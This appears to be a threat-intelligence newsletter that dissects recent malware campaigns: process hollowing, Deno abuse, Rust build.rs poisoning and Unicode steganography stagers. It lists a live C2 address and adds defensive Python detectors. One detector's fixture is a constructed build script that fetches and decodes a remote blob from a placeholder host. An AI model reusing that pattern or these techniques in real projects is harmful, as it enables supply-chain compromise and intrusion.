ZeroDay Field Notes - Shadows in the Supply Chain
Process hollowing, Deno signing abuse, build-time supply chain poisoning, and AOT evasion: this week's techniques dissected for operators.
Hey operators, UncleSp1d3r here. Last edition we chewed on some persistent RAT evolutions; today, we're pivoting toward supply-chain sleights of hand and runtime abuses. Lots of interesting technique work this week, so let's get into how these things actually function under the hood.
RAT Races: Process Hollowing and Fileless Chains
Remcos RAT keeps popping up, but this crop of campaigns is worth studying for the execution chain mechanics. A fileless variant uses a multi-stage pipeline: a JavaScript dropper calls out for an AES-encrypted PowerShell payload, which decrypts and loads a .NET injector. That injector performs process hollowing against aspnet_compiler.exe, a legitimate .NET compilation tool that's typically allowlisted.
Process hollowing here works the classic way: spawn aspnet_compiler.exe in a suspended state, call NtUnmapViewOfSection to carve out the legitimate code, write the Remcos payload into the hollowed address space, then resume the thread. The result is a process that looks right in Task Manager and passes most EDR parent-child checks, but its memory contents are entirely attacker-controlled. No file ever hits disk. The only artifacts are the in-memory payload and C2 traffic. Trellix's writeup includes hashes for every stage if you want to pull samples Fileless Multi-Stage Remcos RAT: From Phishing to Memory.
Meanwhile, the ZPHP campaign pushes Remcos via ClickFix social engineering against U.S. SLTT governments. ClickFix is worth understanding as a delivery mechanism: the victim hits a page mimicking Cloudflare Turnstile, which instructs them to open the Windows Run dialog and paste a command. That command is a PowerShell one-liner that pulls the next stage. It's dead simple, but it works because it shifts execution from browser sandbox to user-context shell. CIS documented the SLTT targeting ZPHP Campaign Delivering Remcos RAT Impacting SLTTs.
XWorm v7.1 exploits CVE-2025-8088, a WinRAR path traversal patched in 7.13 last July. The bug abuses NTFS Alternate Data Streams: a crafted archive extracts a payload into an ADS attached to a startup directory entry, so the file is invisible in Explorer but executes at logon. The delivery chain from there mirrors the Remcos pattern: JS to PowerShell to reflective DLL injection into aspnet_compiler.exe. Trellix maps 19 MITRE techniques across the kill chain Malware-As-A-Service Redefined: XWorm RAT.
C2 intel for emulation: XWorm C2 at 204.10.160.190:7003. Both XWorm and fileless Remcos hollow aspnet_compiler.exe. Detection hinges on hooking NtUnmapViewOfSection and correlating it with aspnet_compiler.exe spawning without a corresponding MSBuild or csc.exe parent. If your EDR isn't watching that call in that context, both of these chains fly clean.
Runtime Reapers: Deno Signing Abuse and AOT Compilation Evasion
CastleRAT is the first documented case of abusing the Deno JavaScript runtime for fileless delivery, and the technique is clever. Here's why Deno matters: unlike Node.js, Deno ships as a single signed binary with a valid Authenticode signature. Most EDR reputation engines and application allowlisting tools treat signed binaries from known vendors as trusted. So when Deno executes a malicious script, the process tree looks legitimate.
The payload delivery uses JPEG steganography: the malware embeds encrypted shellcode in the least-significant bits of JPEG pixel data. A PyArmor-obfuscated Python script extracts the hidden bytes, decrypts them, and reflectively loads the result into memory. No intermediate files, no unsigned binaries. Persistence lands in a scheduled task named "VirtualSmokestGuy666" (not subtle, but functional). ThreatDown's analysis has the full chain and C2 indicators CastleRAT attack first to abuse Deno.
Why this is hard to catch: every step of the chain (signed Deno binary runs JS, JS calls Python, Python extracts from JPEG, payload loads reflectively) runs under a binary that is either signed or a legitimate interpreter. Separate MalBeacon reporting links CastleRAT payloads to Velvet Tempest and Termite ransomware, but via a different ClickFix delivery vector, not the Deno chain.
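As an added example (not code from Trellix, ThreatDown or this newsletter), here is a small Python correlation over constructed Sysmon-style events for the two chains above: aspnet_compiler.exe spawned outside a build toolchain and then unmapped by another process, and the signed Deno runtime spawning an interpreter. Event field names, PIDs and paths are assumptions for the demo.

```python
"""Added example (not from Trellix, ThreatDown or the page): correlate constructed
process-creation and API telemetry to flag the two chains described above."""

# Constructed Sysmon-style records; field names are assumptions for this demo.
EVENTS = [
    {"type": "ProcessCreate", "pid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe"},            # JS dropper -> PowerShell
    {"type": "ProcessCreate", "pid": 4212,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},  # hollowing target
    {"type": "ApiCall", "pid": 4100, "target_pid": 4212, "api": "NtUnmapViewOfSection"},
    {"type": "ProcessCreate", "pid": 5000,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe",
     "parent_image": r"C:\Program Files\MSBuild\Current\Bin\MSBuild.exe"},  # legitimate build
    {"type": "ProcessCreate", "pid": 6100, "image": r"C:\Users\dev\.deno\bin\deno.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "ProcessCreate", "pid": 6120, "image": r"C:\Python312\python.exe",
     "parent_image": r"C:\Users\dev\.deno\bin\deno.exe"},             # Deno -> Python hop
]

BUILD_PARENTS = {"msbuild.exe", "csc.exe"}      # the parents the page calls expected
INTERPRETERS = {"python.exe", "pythonw.exe", "powershell.exe", "cmd.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: list) -> list:
    """Return (severity, pid, reason) tuples; order follows process creation."""
    procs = {e["pid"]: e for e in events if e["type"] == "ProcessCreate"}
    # PIDs that some other process unmapped a section from: the hollowing telemetry.
    unmapped = {e["target_pid"] for e in events
                if e["type"] == "ApiCall" and e["api"] == "NtUnmapViewOfSection"
                and e["target_pid"] != e["pid"]}
    alerts = []
    for pid, e in procs.items():
        img, parent = basename(e["image"]), basename(e["parent_image"])
        if img == "aspnet_compiler.exe" and parent not in BUILD_PARENTS:
            # Unexpected parent alone is medium; with a remote unmap it is the hollowing pattern.
            if pid in unmapped:
                alerts.append(("high", pid, f"aspnet_compiler.exe spawned by {parent} and unmapped by another process"))
            else:
                alerts.append(("medium", pid, f"aspnet_compiler.exe spawned by {parent}"))
        if parent == "deno.exe" and img in INTERPRETERS:
            alerts.append(("high", pid, f"signed Deno runtime spawned {img}"))
    return alerts

if __name__ == "__main__":
    for sev, pid, why in detect(EVENTS):
        print(sev, pid, why)
```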
On the .NET front, Cyderes reversed an AOT-compiled dropper for Rhadamanthys and XMRig. This one matters for a specific technical reason: .NET AOT (Ahead-of-Time) compilation produces a native binary with no IL (Intermediate Language) to decompile. Traditional .NET analysis tools (dnSpy, ILSpy) are useless against it because there's no MSIL bytecode to disassemble. JIT hooks that security tools use to inspect .NET execution at runtime also don't fire, because there's no JIT compilation happening. The binary looks like any native C/C++ executable to static analysis.
The sample also packs anti-VM sandbox scoring: it checks core count, RAM, disk size, and recent file timestamps to assign a "real machine" confidence score before detonating. Cyderes walks through the reversing process in Binary Ninja, which is a useful reference if you're building methodology for native .NET analysis Reverse Engineering .NET AOT Malware.
Supply-Chain Shenanigans: Build-Time Poisoning and Extension Sleepers
The Contagious Trader campaign is a textbook study in supply-chain indirection. The attack surface is npm packages and GitHub repos posing as crypto trading bots. What makes the technique interesting is the Rust crate layer: the npm packages declare build dependencies on Rust crates that look benign in source review. The malicious logic only materializes at build time, when the crate's build.rs script pulls encrypted payloads from an external host, decrypts them, and compiles them into the final binary. Your dependency scanner sees clean source; the compiled output contains an SSH implant and exfil tooling.
KMSEC's analysis attributes this to Lazarus/FAMOUS CHOLLIMA and documents OPSEC slips including Astrill VPN exit node IPs that map back to known DPRK infrastructure. Over 30 repos, 37 packages, full C2 topology in the writeup Contagious Trader campaign.
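An added example (not KMSEC's tooling or the campaign's code) of the audit the build-time trick above calls for: a Python heuristic that triages a crate's build.rs for the fetch-decrypt-write-into-build-output shape, run over two constructed build scripts. The indicator list and thresholds are assumptions; legitimate -sys crates sometimes download artifacts, so the output is a review queue, not a verdict.

```python
"""Added example (not KMSEC's tooling or the page's): heuristic triage of Rust
build.rs scripts for the fetch-decrypt-compile pattern described above."""
import re

# Assumed indicators. Each alone is common in honest build scripts; the
# combination of a remote fetch with a write into the build output is the shape to review.
INDICATORS = [
    ("network client", r"\b(reqwest|ureq|hyper|curl|attohttpc)\b|std::net::|TcpStream::connect"),
    ("url literal", r"https?://[\w./-]+"),
    ("exec", r"std::process::Command|Command::new\("),
    ("decode/decrypt", r"\b(aes|chacha|xor|decrypt)\w*\b"),
    ("writes build output", r"OUT_DIR|fs::write\(|File::create\("),
]

def audit_build_script(src: str) -> dict:
    """Return a verdict plus the matched tokens per indicator."""
    hits = {}
    for label, rx in INDICATORS:
        found = sorted({m.group(0) for m in re.finditer(rx, src, re.I)})
        if found:
            hits[label] = found
    fetches = "network client" in hits or "url literal" in hits
    if fetches and "writes build output" in hits:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "hits": hits}

# Constructed build.rs samples, not real crates.
BENIGN_BUILD = '''fn main() {
    println!("cargo:rerun-if-changed=src/native.c");
    cc::Build::new().file("src/native.c").compile("native");
}'''
POISONED_BUILD = '''use std::{env, fs, path::Path};
fn main() {
    let out = Path::new(&env::var("OUT_DIR").unwrap()).join("stage.rs");
    let blob = ureq::get("https://cdn.example.invalid/u.bin").call().unwrap().into_string().unwrap();
    fs::write(&out, xor_decode(blob.as_bytes(), b"k3y")).unwrap();
}'''

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_BUILD), ("poisoned", POISONED_BUILD)):
        print(name, audit_build_script(src))
```

Run it over the output of cargo vendor to cover every build.rs the build will actually execute, not just the top-level crate.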
Why this is hard to catch: The malicious code never exists in the source repository. It's fetched and compiled at build time by the Rust toolchain. Auditing the crate source shows nothing; you'd need to intercept the network calls during cargo build or diff the compiled output against expected behavior. The Astrill VPN IPs are a hunting pivot if you're working attribution.
A related DPRK stager uses text steganography in Pastebin: payloads are encoded as invisible Unicode characters (zero-width joiners, variation selectors) embedded in normal-looking text posts. The stager fetches the paste, strips visible characters, decodes the hidden ones, and executes the result. It's a neat C2/staging trick because the Pastebin content passes casual inspection and most automated content scanning Novel DPRK stager.
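An added example (not from the page's sources) of the content check the Pastebin stager above slips past: a Python scanner that counts zero-width and variation-selector code points and flags long runs or high density, tested on two constructed posts. The bit-to-character scheme in the constructed sample (ZWJ = 1, ZWNJ = 0) and the thresholds are assumptions; the page does not describe the real encoding.

```python
"""Added example (not from the page's sources): flag text that carries a
hidden zero-width / variation-selector payload, as in the Pastebin stager."""

ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\u2061",
              "\u2062", "\u2063", "\u2064", "\ufeff"}

def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    return (ch in ZERO_WIDTH
            or 0xFE00 <= cp <= 0xFE0F        # variation selectors
            or 0xE0100 <= cp <= 0xE01EF      # variation selectors supplement
            or 0xE0000 <= cp <= 0xE007F)     # Unicode tag characters

def scan(text: str, min_run: int = 8, max_ratio: float = 0.05) -> dict:
    """Count invisible code points; a long run or a high ratio is the stager's shape.
    Thresholds are assumptions: a lone VS16 after an emoji is normal, 32 joiners are not."""
    total = run = longest = 0
    for ch in text:
        if is_invisible(ch):
            total += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    ratio = total / len(text) if text else 0.0
    return {"invisible": total, "longest_run": longest, "ratio": round(ratio, 3),
            "suspicious": longest >= min_run or ratio > max_ratio}

def visible(text: str) -> str:
    """What a reader sees: the cover text with the hidden characters removed."""
    return "".join(ch for ch in text if not is_invisible(ch))

# Constructed samples. The hidden bits use an assumed scheme (ZWJ = 1, ZWNJ = 0);
# the real stager's encoding is not described on the page.
BENIGN = "Shipping v2.1 today \u2764\ufe0f thanks everyone!"
_hidden = "".join("\u200d" if b == "1" else "\u200c" for b in format(0xDEADBEEF, "032b"))
HIDDEN = "Weekly update: builds green, " + _hidden + "no blockers."

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("hidden", HIDDEN)):
        print(name, scan(sample), repr(visible(sample)))
```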
GlassWorm demonstrates another indirection pattern: extensions published to Open VSX sit dormant until a timed update flips them active. The updated extension doesn't contain the payload directly; instead, it downloads a VSIX package from a GitHub release artifact and sideloads it. This two-hop delivery (registry to GitHub to payload) means the registry's malware scanning only ever sees the clean loader. Socket documented the activation mechanics across 72+ extensions, including one that used Google Calendar API as a C2 channel for tasking GlassWorm Sleeper Extensions.
Espionage Echoes: Persistence Tricks from State Actors
FancyBear's OPSEC fumble this week exposed an open directory containing their toolkit for Roundcube exploitation via CVE-2023-43770 (a stored XSS in how Roundcube renders link references in plain-text emails). The leaked tools show the post-exploitation playbook: inject JavaScript that steals TOTP secrets, creates email forwarding rules to an attacker mailbox, and dumps the address book. The XSS fires every time the victim views the crafted email, so persistence is tied to the message sitting in their inbox FancyBear Exposed.
The related Operation Roundish analysis reveals the httd implant, a 5.2 MB statically compiled Go binary disguised as an HTTP daemon. What's interesting is its persistence layering: on standard Linux it drops a cron job running every minute as root; on systemd hosts it installs a service named linux.service from /boot; on SELinux-enforcing systems it generates and loads a custom policy module using audit2allow to whitelist its own execution. Three persistence mechanisms in one binary, auto-selected based on the target environment Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit.
StoatWaffle from WaterPlum (DPRK-linked) chains PowerShell to Node.js for exfil through VSCode extension repos, using WSL as a bridging environment between Windows and Linux execution contexts. NTT's analysis (in Japanese) covers the loader stages StoatWaffle, the malware used by WaterPlum (original title: WaterPlumが使用するマルウェアStoatWaffle).
CamelClone uses LNK files that invoke Rclone for MEGA cloud exfiltration, a living-off-the-land approach where the exfil tool is a legitimate, signed file sync utility Government Entities Targeted By CamelClone.
Quick Hits
Tinycontrol IoT (CVE-2025-11500): Login page returns a JSON blob containing encoded (not hashed) credentials to unauthenticated HTTP requests. Weak encoding (CWE-261), local network only Vulnerabilities in multiple tinycontrol devices.
Storm-2561: SEO-poisoned sites impersonate VPN vendors, serve DLL sideloading packages where a signed binary loads a malicious DLL (Hyrax infostealer). Microsoft published Yara rules Storm-2561 Uses SEO Poisoning.
Fake Telegram sites: In-memory RAT delivery via rundll32 injection Fake Telegram Site.
COVERT RAT: GitHub-hosted payloads with Rust-based evasion targeting Argentina's judiciary COVERT RAT Delivered.
GoPix: Brazilian banking trojan using memory-only implants and non-standard port C2 to manipulate transactions GoPix banking Trojan.
Slopoly: IBM X-Force documents LLM-generated C2 code for Hive0163 ransomware operations. The generated code is functional but stylistically distinct from human-written malware, which is itself a detection signal A Slopoly start.
FortiGate edge intrusions: Multiple CVEs chained for SSO credential theft. SentinelOne's DFIR walkthrough covers the forensic artifacts Hackers Exploit FortiGate.
Perseus Android DTO: Abuses Accessibility Services to read notification content and screen text; distributed as fake IPTV apps Perseus: DTO malware.
Closing Cipher
Big theme this week: indirection. Every interesting chain here adds a layer between the malicious intent and the observable artifact: build-time crate fetches, JPEG stego, signed runtime abuse, sleeper extension updates, ADS path traversal. The technical trend is clear: the payload is never where the scanner is looking. Stay frosty out there.
~ UncleSp1d3r